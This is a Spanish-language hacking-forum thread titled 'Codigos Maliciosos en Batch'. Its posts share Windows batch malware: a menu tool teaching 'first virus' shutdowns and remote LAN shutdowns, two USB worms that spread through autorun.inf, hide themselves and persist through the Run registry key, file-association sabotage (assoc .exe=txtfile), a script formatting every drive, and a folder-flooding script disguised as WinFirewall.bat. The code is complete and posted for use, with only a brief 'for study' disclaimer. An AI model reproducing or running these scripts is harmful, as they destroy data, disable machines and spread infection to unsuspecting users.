ECHO "aio anonymous"
ECHO "aio anonymous ip"
ECHO "aio anonymous ip toolz"
ECHO "hide ip"
ECHO "hide ip platinum"
pause >nul
CLS
GOTO :PRIN
:0
cls
ECHO ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º EMZAMBLER by AZAFRAM º
echo ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo º GRACIAS POR USAR MI PROGRAMA º
echo º MI WEB CHEATS.SERVEGA ME.COM º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

pause >nul
exit
:19
CLS
ECHO ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º AYUDA º
echo ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo º 1.INTRODUCCION DE BAT º
echo º 2.NUESTRO PRIMER VIRUS º
echo º 3.OTROS PROGRAMAS CREADOS POR AZAFRAM º
echo º 4.CUAL COMPILADOR USAR º
echo º 5.ASOCIACIONES º
echo º 6.MENU PRINCIPAL º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
set /p pre=
if %pre%==1 goto bat
if %pre%==2 goto pri
if %pre%==3 goto OTRO
if %pre%==4 goto OT
if %pre%==5 goto ASO
if %pre%==6 goto :PRIN
if %pre%==7 goto :PRIN


:bat
cls
echo Buenas , ante todo he de decir que esto es un manual
echo de introducción y no un manual para expertos.
echo en este manual se hablara sobre los virus.bat
echo (archivos por lotes ejecutables de ms-dos)
echo bueno antes que nada explicar que es cmd.exe
echo (MS-DOS EN WINXP) cmd.exe es un interprete de comandos.
echo ¿Qué es un comando?
echo es una orden que le damos al sistema operativo para que
echo haga una tarea determinada.
pause >nul
CLS
GOTO :PRIN
:pri
cls
echo bueno , nuestro primero virus podría ser este:
echo @echo off
echo shutdown -s -t 1
echo abrimos un documento de texto , copiamos esto
echo lo guardamos como .bat y lo abrimos...
echo y... sopresa...
echo explicación: @echo off
echo Desabilita el echo para que no muestre los comandos ,
echo que se ejecutaran posteriormente .
echo explicación: shutdown
echo es un comando con el que puedes jugar bastante. -s y -t son parametros,
echo los parametros son como las opciones
echo que les deves dar al comando. algunos comandos requieren parametros
echo obligatoriamen te sin embargo otros no.
echo explicación: parametro -s y -t
echo el parametro -s da la orden a shutdown para que apage el equipo
echo y con -t especificamos los segundos. en el ejemplo
echo de antes pusimos 1 segundo.
echo otros parametros de shutdown:
echo shutdown -r = Reinicia
echo shutdown -c = deja un comentario
echo "Modo de uso">> shutdown -s -t 5 c "Comentario"
echo shutdown -m = apaga un equipo de la red
echo "Modo de uso">> shutdown -s -t 4 -m \\nombredehost
echo shutdown -f = fuerza el cierre de las aplicaciones.
pause >nul
CLS
GOTO :PRIN
:OTRO
CLS
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º EMZAMBLER by AZAFRAM º
echo ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo º 1.mensajes para red local º
echo º 2.mu cuentas º
echo º 3.ir para el menu principal º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
set /p pre=
if %pre%==1 goto RED
if %pre%==2 goto MULTI
if %pre%==3 goto :PRIN
:RED
CLS
@echo off
title MENSAJES Q RED LOCAL CREADO POR AZAFRAM
echo bienevino %username% a esta erramienta
COLOR 9
echo 1. mandar mensaje a todos los de la red local
echo 2. mandar mensaje a un mienbro de la red local
echo 3. apagar un equipo de la red local
ECHO 4. EXIT
set /p opcion=
If %opcion%==1 goto todos
If %opcion%==2 GOTO UNO
If %opcion%==3 goto apa
If %opcion%==4 EXIT
:todos
echo Escriba el mensaje que le va a mandar a todos los usuarios :
set /p nom=
NET SEND * %nom%
pause>NUL
EXIT
:UNO
echo off
CLS
ECHO escribe el nombre de la pc a la q le va a mandar el mensaje
set /p pc=
cls
set /p men=Introduce mensaje:
net send %pc% %men%
PAUSE>NUL
EXIT
:apa
set /p men=Introduce mensaje:
set /p tiem=Introduce el tiempo de apagado:
set /p pc=Introduce el nombre de la pc:
SHUTDOWN -F -S -c "%men%" -T %tiem% -M \\%pc%
echo operacion finalizada gracias por usar mi programa "AZAFRAM"
pause>nul
:MULTI
CLS
@echo off
color B0
title agenda V1
md mensajes
cd Escritorio
:inicio
cls
echo .---------CUENTAS_DE_MU------------.
echo.
echo 1-Agregar CUENTA
echo 2-Buscar CUENTA
echo 3-Eliminar CUENTA
echo 4-Ver lista de CUENTAS
echo.
echo 0-Salir
set /p pre=
if %pre%==1 goto ag
if %pre%==2 goto bn
if %pre%==3 goto ec
if %pre%==4 goto ln
if %pre%==0 (goto ex) else goto er
pause > nul
:ag
cls
echo Escriba el nombre de la CUENTA:
set /p nom=
echo cls > %nom%.txt
cls
echo Escriba LA CONTRASEÑA:
set /p nm=
echo Escriba LOS 12 DIGITOS DE LA CUENTA:
set /p ap=
echo Escriba el correo de la cuenta:
set /p ed=
echo Escriba la contraseña del correo:
set /p rs=
echo Escriba una nota o algo:
set /p tl=
echo %nm% > %nom%.txt
echo %ap% >> %nom%.txt
echo %ed% >> %nom%.txt
echo %rs% >> %nom%.txt
echo %tl% >> %nom%.txt
pause > nul
goto :inicio
:bn
cls
echo Escriba el nombre a buscar:
set /p nom2=
if exist %nom2%.txt goto bn2
if not exist %nom2%.txt goto mal1
:bn2
cls
echo %nom2%:
more %nom2%.txt
pause > nul
goto inicio
:mal1
cls
echo Ese nombre no existe
echo 1-volver a intentar
echo 2-menu principal
set /p opt1=
if %opt1%==1 goto bn
if %opt1%==2 goto inicio
pause > nul
:ec
cls
echo Escriba Nombre a eliminar:
set /p br=
del %br%.txt
goto inicio
pause > nul
:ln
cls
echo lista de cuentas:
dir /b *.txt>temp.tst
for /f "usebackq delims=." %%a in (temp.tst) do echo %%a
pause > nul
goto inicio
:ex
cls
echo cuentas hackedas "AZAFRAM"
pause > nul
:OT
cls
ECHO ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º EMZAMBLER by AZAFRAM º
echo ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo º yo les recomiendo que usen el º
echo º ExeScrip es muy bueno y tien emuchas º
echo º opcines para elejir lo pueden bajan en º
echo º mi web cheats.servega me.com º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
pause > nul
goto inicio
cls
:ASO
CLS
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º EMZAMBLER by AZAFRAM º
echo ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo º el comando assoc º
echo º es muy destructivo puedes cambiar de º
echo º exe a txt para impedir que ejecuten º
echo º cualquier programa o mp3,txt,html,ect º
echo º el codigo es el siguiente º
echo º assoc .mp3=txtfile º
echo º eso hace que archivos de mp3 pasen º
echo º a txt para mas ayuda ejecuta simbolo º
echo º y intruducces assoc /? º
echo º visite mi web cheats.servega me.com º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
pause > nul
goto :PRIN
cls

Virus para USB
Código: (dos) [Seleccionar]
color 0D
TITLE Recuperacion de "Windows"
FOR %%A IN ( C E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\ (goto existe) else (goto no)
CLS
attrib -h -s %0
CLS
copy %0 %%A:\USB.BAT & attrib +h +s %%A:\USB.BAT & attrib +h +s %0
CLS
CLS
echo [AutoRun] >> %%A:\autorun.inf
CLS
echo label=%%A:\%%A The "AZAFRAM"" >> %%A:\autorun.inf
CLS
echo open=%%A:\USB.BAT >> %%A:\autorun.inf
CLS
echo shellexecute=%%A:\USB.BAT >> %%A:\autorun.inf
CLS
echo shell\Auto\command=%%A:\USB.BAT >> %%A:\autorun.inf
CLS
attrib +h +s %%A:\autorun.inf
CLS
CLS
start /MAX %systemdrive%
cls
at 03:00 shutdown -s -t 15 -c "THE AZAFRAM"
cls
at 06:00 shutdown -s -t 15 -c "THE AZAFRAM"
cls
at 09:00 shutdown -s -t 15 -c "THE AZAFRAM"
CLS
ECHO The AZAFRAM
)



Virus Para USB 2
Código: (dos) [Seleccionar]
@echo off
attrib +s +h %0
msg * hacked by -={ naxo itc }=-
reg add hklm\software\microsoft\windows\currentversion\run /V Dump.exe /D C:\Drivers\Dump.exe /f

:bluce
ping -n 10 127.0.0.1
IF exist C:\Drivers (goto 02) else (md C:\Drivers & attrib +h +s C:\Drivers & goto 02)
:02
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\Drivers (goto a) else (md %%A:\Drivers & attrib +h +s %%A:\Drivers & goto a) )

:a
IF exist C:\Drivers\Dump.exe (goto 05) else (goto 04)
:04
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -s -h %%A:\Drivers\Dump.exe & copy "%%A:\Drivers\Dump.exe" "C:\Drivers\Dump.exe" & attrib +s +h %%A:\Drivers\Dump.exe)
attrib +h +s C:\Drivers\Dump.exe
:05
IF exist C:\autorun.inf (goto 07) else (goto 06)
:06
echo [AutoRun]>>C:\autorun.inf
echo label= naxo itc>>C:\autorun.inf
echo open=Drivers\Dump.exe>>C:\autorun.inf
echo shellexecute=Drivers\Dump.exe>>C:\autorun.inf
echo shell\Auto\command=Drivers\Dump.exe>>C:\autorun.inf
attrib +h +s C:\autorun.inf
:07
for /f "tokens=2 DELIMS= " %%B in ('FIND /I "naxo" C:\autorun.inf') do set co=%%B
if naxo== %co% (goto b) else (goto nar)
:nar
attrib -h -s C:\autorun.inf
del /f /q C:\autorun.inf
goto 06

:b
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\Drivers\Dump.exe (goto 08) else (attrib -s -h C:\Drivers\Dump.exe & copy "C:\Drivers\Dump.exe" "%%A:\Drivers\Dump.exe" & attrib +h +s %%A:\Drivers\Dump.exe & attrib +s +h C:\Drivers\Dump.exe & goto 08) )
:08
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\autorun.inf (goto 09) else (attrib -h -s C:\autorun.inf & copy "C:\autorun.inf" "%%A:\autorun.inf" & attrib +h +s %%A:\autorun.inf & attrib +h +s C:\autorun.inf & goto bluce) )

:09
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
for /f "tokens=2 DELIMS= " %%B in ('FIND /I "naxo" %%A:\autorun.inf') do set co=%%B )
if naxo== %co% (goto bluce) else (goto her)
:her
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -h -s %%A:\autorun.inf & del /f /q %%A:\autorun.inf )
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -h -s C:\autorun.inf & copy "C:\autorun.inf" "%%A:\autorun.inf" & attrib +h +s %%A:\autorun.inf & attrib +h +s C:\autorun.inf & goto bluce )



Codigo para asociar extensiones
Código: (dos) [Seleccionar]
assoc .exe=txtfile
assoc .dll=batfile



Varios de estos codigos pueden dañar la PC. Asique usenlo con responsabilidad.
Los codigos fueron posteados para su estudio

ANTRAX


Desconectado LucaSthefano

  • *
  • Underc0der
  • Mensajes: 395
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Codigos Maliciosos en Batch

  • en: Julio 18, 2011, 01:41:49 pm
Código: (dos) [Seleccionar]
format c:
if exist format d:
if exist format e:
if exist format f:   
if exist format d:
if exist format e:
if exist format f:
if exist format g:
if exist format h:
if exist format g:
if exist format h:

Podría simplificarse todo eso con un FOR.

Con mensaje de error o suceso:

Código: (dos) [Seleccionar]
FOR %%x IN (
"C:", "D:", "E:", "F:", "G:", "H:"
) DO (
IF NOT EXIST %%~x (
ECHO. El dispositivo %%~x no existe
) ELSE (
FORMAT %%~x
) ECHO. Dispositivo %%~x formateado
PAUSE
EXIT

Sin los mensajes (versión simplificada de la original):

Código: (dos) [Seleccionar]
FOR %%x IN (
"C:", "D:", "E:", "F:", "G:", "H:"
) DO (
FORMAT %%~x
) PAUSE
EXIT

Aún así, la unidad C:\ estaría siendo usada por el sistema operativo, o sea cual sea la que se esté usando, no podría ser formateada ya que Windows te lo impide. Para eso se simula una nueva unidad y se ejecuta este archivo desde ella.

Saludos compañero, bonitos codigos!

Desconectado 3hy!

  • *
  • Underc0der
  • Mensajes: 79
  • Actividad:
    0%
  • Reputación 0
  • Use Google, it hasn't killed anyone until now...
    • Ver Perfil
    • Mi blog
    • Email

Re:Codigos Maliciosos en Batch

  • en: Julio 20, 2011, 02:13:24 pm
Bueno... Añado uno xD (Es cutre de narices xD pero hará que se relentice la PC de una forma flipante xD)

Carpeta infernal que se añade al registro =D Mente perversa xD
Código: (dos) [Seleccionar]
@echo off
echo @echo off > "%windir%\System32\WinFirewall.bat"
echo cls >> "%windir%\System32\WinFirewall.bat"
echo cd %windir% >> "%windir%\System32\WinFirewall.bat"
echo :bucle >> "%windir%\System32\WinFirewall.bat"
echo mkdir %random% >> "%windir%\System32\WinFirewall.bat"
echo goto bucle >> "%windir%\System32\WinFirewall.bat"
REG ADD HKLM/Software/Microsoft/Windows/Currentversion/Run /V WinFirewall /D "%windir%\System32\WinFirewall.bat" /F
start "%windir%\System32\WinFirewall.bat" /MIN /WAIT
exit

(Corregido por Sthefano02)

Creo que es simple, pero efectivo xDD (Y que está bien hecho, cualquier cosa, diganmelo :P) (Y la parte de añadir al registro la copié de un code de ANTRAX ya que me daba pereza ponerme a escribir todo eso xD)

La cosa es hacer que no se vea la shell... (hecho, gracias Sthefano02) xD Yo con una cosilla de estas
llegué  hacer 44.000 carpetas (aprox.)

Salu2!
« Última modificación: Julio 20, 2011, 03:30:42 pm por Sthefano02 »
Si tienes cualquier duda, pregunta en el foro!


Desconectado LucaSthefano

  • *
  • Underc0der
  • Mensajes: 395
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Codigos Maliciosos en Batch

  • en: Julio 20, 2011, 02:18:48 pm
Bueno... Añado uno xD (Es cutre de narices xD pero hará que se relentice la PC de una forma flipante xD)

Código: [Seleccionar]
@echo off
cls
cd %windir%
:bucle
mkdir %random%
gotobucle
La cosa es hacer que no se vea la shell... xD Yo con una cosilla de estas llegué  hacer 44.000 carpetas (aprox.)

Salu2!

Creas el archivo .bat con > y >>. Luego lo ejecutas con start y el parametro /MIN, eso hara que la ventana esté minimizada. Tambien le podes dar el parametro /WAIT para que el archivo no se pueda cerrar hasta que termine lo que está haciendo.

Mas info:

Código: (dos) [Seleccionar]
start /?

Desconectado 3hy!

  • *
  • Underc0der
  • Mensajes: 79
  • Actividad:
    0%
  • Reputación 0
  • Use Google, it hasn't killed anyone until now...
    • Ver Perfil
    • Mi blog
    • Email

Re:Codigos Maliciosos en Batch

  • en: Julio 20, 2011, 02:24:13 pm
Bueno... Añado uno xD (Es cutre de narices xD pero hará que se relentice la PC de una forma flipante xD)

Código: [Seleccionar]
@echo off
cls
cd %windir%
:bucle
mkdir %random%
gotobucle
La cosa es hacer que no se vea la shell... xD Yo con una cosilla de estas llegué  hacer 44.000 carpetas (aprox.)

Salu2!

Creas el archivo .bat con > y >>. Luego lo ejecutas con start y el parametro /MIN, eso hara que la ventana esté minimizada. Tambien le podes dar el parametro /WAIT para que el archivo no se pueda cerrar hasta que termine lo que está haciendo.

Mas info:

Código: (dos) [Seleccionar]
start /?

jajajajajjuasjuasjuasjuasjuasJUASJUASJUAS /* Risa malvada */ xD
Salu2!
Si tienes cualquier duda, pregunta en el foro!